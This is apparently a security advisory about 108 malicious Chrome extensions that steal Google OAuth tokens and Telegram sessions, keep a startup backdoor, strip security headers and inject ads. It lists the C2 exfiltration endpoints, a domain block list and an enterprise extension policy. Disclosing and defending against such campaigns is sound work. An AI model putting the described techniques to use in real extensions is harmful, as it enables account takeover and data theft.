108 Malicious Chrome Extensions Caught Stealing Google Tokens and Telegram Sessions
Introduction
Security researchers at Socket have uncovered a coordinated cluster of 108 malicious Chrome extensions that share a single command-and-control infrastructure. Collectively installed roughly 20,000 times, the extensions harvest Google OAuth tokens, hijack Telegram sessions, inject ads, and open a backdoor that lets the operator push arbitrary URLs to every infected browser.
What Happened
The 108 extensions were published under five different developer identities — Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt — but all phone home to the same C2 domain: cloudapi.stream. The campaign breaks down into several attack modules:
Google account harvesting — 54 of the extensions call the chrome.identity.getAuthToken API to silently obtain OAuth2 tokens, then exfiltrate email addresses, names, profile pictures, and account IDs to mines.cloudapi.stream/auth_google.
Telegram session theft — An extension named "Telegram Multi-account" scrapes Telegram Web's localStorage and session tokens every 15 seconds. Stolen sessions are sent to tg.cloudapi.stream/save_session.php. The C2 also supports remote session replacement, giving the attacker full account takeover without needing credentials.
Universal backdoor — 45 extensions include a loadInfo() function that fires on every browser startup. It fetches a URL from the C2 and opens it silently, meaning the operator can push phishing pages, redirects, or exploit kits to every victim at will.
Security header stripping — The extensions use Chrome's declarativeNetRequest API to strip Content-Security-Policy, X-Frame-Options, and CORS headers from responses, enabling further injection attacks on sites that would otherwise block them.
Ad injection — JavaScript is injected into YouTube and TikTok pages to overlay or replace legitimate ads with the attacker's monetization payloads.
The infrastructure points to a Russian-language malware-as-a-service operation with centralized operator control.
Why It Matters
Browser extensions occupy a uniquely privileged position. They run with the user's identity, access every page the user visits, and persist across browser restarts. Unlike phishing emails that require a click, a malicious extension installed once keeps exfiltrating silently. The OAuth token theft is especially dangerous — those tokens can be used to access Google Drive, Gmail, and Workspace APIs without triggering MFA prompts.
Who Is Affected
- Any Chrome or Chromium-based browser user who installed extensions from the five publisher accounts
- Organizations that allow unmanaged browser extension installation
- Google Workspace and Telegram users whose sessions may have been hijacked
- Approximately 20,000 installations were recorded before discovery
How to Protect Yourself
Audit installed extensions immediately. Open chrome://extensions and review everything. Remove any extension from the five publisher names listed above (Yana Project, GameGen, SideGames, Rodeo Games, InterAlt).
For enterprise environments, enforce an extension allowlist via Chrome group policy:
Registry: HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist
Or via Chrome Enterprise JSON policy:
{
"ExtensionInstallBlocklist": ["*"],
"ExtensionInstallAllowlist": ["<approved_extension_id_1>", "<approved_extension_id_2>"]
}
Revoke compromised Google tokens. Go to Google Account Security and review third-party app access. Remove anything unfamiliar.
Rotate Telegram sessions. In Telegram Desktop or Web, go to Settings > Devices > Terminate All Other Sessions.
Monitor for indicators. Block the C2 domain at your DNS or firewall level:
cloudapi.stream
mines.cloudapi.stream
tg.cloudapi.stream
Deploy endpoint detection that monitors chrome.identity.getAuthToken abuse and unusual declarativeNetRequest rule changes.